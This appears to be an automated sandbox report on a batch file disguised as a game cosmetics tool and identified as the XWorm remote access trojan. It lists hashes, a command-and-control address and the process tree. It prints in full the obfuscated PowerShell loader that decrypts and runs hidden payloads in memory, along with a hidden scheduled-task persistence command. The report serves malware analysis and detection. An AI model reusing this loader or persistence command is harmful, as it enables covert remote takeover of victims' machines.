Overview

overview

10

Static

static

1

ss cosmeti...am.bat

windows10-2004-x64

10

ss cosmeti...am.bat

windows11-21h2-x64

10

Analysis

  • max time kernel
    1712s
  • max time network
    1158s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-10-2024 00:52

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ss cosmeticx for gtag steam.bat

  • Size

    294KB

  • MD5

    be47f172f3f7ea7f36bcc6dcb6a410f2

  • SHA1

    8da368d5baf6a818ad6148e43a2b7f69b8a56664

  • SHA256

    6a742c075c1099f98e1fe68d4049dbed84ee8015ad349cbe78e0fe969c841a7e

  • SHA512

    b2f43c4676dd0a0ef0452c48f17cdf849f4e8765afbc122deeca08a15a487be2c4c8072e2c2ff02367cb6130a0482817f92ceb117f6ec6c9651630ec77fca68d

  • SSDEEP

    6144:Xt99Rt0+CSyli/VEb/ZOeTbaRuA6m/BvRj8UnJfDRDJkGfVD626QTLDC4uQ:XtrRtiyeNa8AOuDRDJPND6KN

Score
10/10
xwormexecutionrattrojan

Malware Config

Extracted

Family

xworm

C2

147.185.221.23:13469

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ss cosmeticx for gtag steam.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1968
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MgnuZSzTu17Yhp4hwWzsvhgscLHcnyZMocvwuy+MWdw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SIukVXrNvfVq6KjuHyZRLw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $arePn=New-Object System.IO.MemoryStream(,$param_var); $NTyMA=New-Object System.IO.MemoryStream; $qjyXc=New-Object System.IO.Compression.GZipStream($arePn, [IO.Compression.CompressionMode]::Decompress); $qjyXc.CopyTo($NTyMA); $qjyXc.Dispose(); $arePn.Dispose(); $NTyMA.Dispose(); $NTyMA.ToArray();}function execute_function($param_var,$param2_var){ $iTabt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $pdcBA=$iTabt.EntryPoint; $pdcBA.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\ss cosmeticx for gtag steam.bat';$avPbU=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\ss cosmeticx for gtag steam.bat').Split([Environment]::NewLine);foreach ($TtrAP in $avPbU) { if ($TtrAP.StartsWith(':: ')) { $neJKQ=$TtrAP.Substring(3); break; }}$payloads_var=[string[]]$neJKQ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4016
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_713_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_713.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4696
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_713.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:3024
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_713.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1372
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MgnuZSzTu17Yhp4hwWzsvhgscLHcnyZMocvwuy+MWdw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SIukVXrNvfVq6KjuHyZRLw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $arePn=New-Object System.IO.MemoryStream(,$param_var); $NTyMA=New-Object System.IO.MemoryStream; $qjyXc=New-Object System.IO.Compression.GZipStream($arePn, [IO.Compression.CompressionMode]::Decompress); $qjyXc.CopyTo($NTyMA); $qjyXc.Dispose(); $arePn.Dispose(); $NTyMA.Dispose(); $NTyMA.ToArray();}function execute_function($param_var,$param2_var){ $iTabt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $pdcBA=$iTabt.EntryPoint; $pdcBA.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_713.bat';$avPbU=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_713.bat').Split([Environment]::NewLine);foreach ($TtrAP in $avPbU) { if ($TtrAP.StartsWith(':: ')) { $neJKQ=$TtrAP.Substring(3); break; }}$payloads_var=[string[]]$neJKQ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:4492

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    3KB

    MD5

    661739d384d9dfd807a089721202900b

    SHA1

    5b2c5d6a7122b4ce849dc98e79a7713038feac55

    SHA256

    70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

    SHA512

    81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    5753571cfc81f894ff82dc383591df11

    SHA1

    54dff38cbb912d61f7f2035f97d4dd75cb1a9f04

    SHA256

    c729a5004a163727dcc457585cd06d0ddee9c4a80327bd97383d08fd8ce413bf

    SHA512

    83483e2b4a2ffc2a7f7d38160d3e28f0fbeeac30563f57c8d5a6a9b32069a67ddddfb823c9ff1ae8fd057dfc53b8c8e43e58e0ca5907487b472e3152d21e1fb6

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oug0n4co.v3t.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\startup_str_713.bat
    Filesize

    294KB

    MD5

    be47f172f3f7ea7f36bcc6dcb6a410f2

    SHA1

    8da368d5baf6a818ad6148e43a2b7f69b8a56664

    SHA256

    6a742c075c1099f98e1fe68d4049dbed84ee8015ad349cbe78e0fe969c841a7e

    SHA512

    b2f43c4676dd0a0ef0452c48f17cdf849f4e8765afbc122deeca08a15a487be2c4c8072e2c2ff02367cb6130a0482817f92ceb117f6ec6c9651630ec77fca68d

    Download Submit

  • C:\Users\Admin\AppData\Roaming\startup_str_713.vbs
    Filesize

    115B

    MD5

    79c4f997290c98d5d91a8415d3d3076a

    SHA1

    2c0cf17ef5d0759f5b6ad809d543d46e1e15ce2d

    SHA256

    3b9fc4c5457b3ae8527625d5193335387e051e089ba9a1e73864d85125f7c2a2

    SHA512

    e5f74ef778e383aaa462c16b0e221374f677c369035622409a1fd11cf377f0fbc72276550867014fee7049ec7ecefb395210827140d9175d9cb1f06edd19ba11

    Download Submit

  • memory/4016-12-0x00007FF8FC3C0000-0x00007FF8FCE81000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4016-14-0x0000015A501A0000-0x0000015A501DA000-memory.dmp

    Filesize

    232KB

    Download

  • memory/4016-13-0x0000015A4FF40000-0x0000015A4FF48000-memory.dmp

    Filesize

    32KB

    Download

  • memory/4016-0-0x00007FF8FC3C3000-0x00007FF8FC3C5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4016-11-0x00007FF8FC3C0000-0x00007FF8FCE81000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4016-6-0x0000015A4FF70000-0x0000015A4FF92000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4016-50-0x00007FF8FC3C0000-0x00007FF8FCE81000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4492-49-0x0000016DF6310000-0x0000016DF6328000-memory.dmp

    Filesize

    96KB

    Download

  • memory/4696-16-0x00007FF8FC3C0000-0x00007FF8FCE81000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4696-26-0x00007FF8FC3C0000-0x00007FF8FCE81000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4696-27-0x00007FF8FC3C0000-0x00007FF8FCE81000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4696-30-0x00007FF8FC3C0000-0x00007FF8FCE81000-memory.dmp

    Filesize

    10.8MB

    Download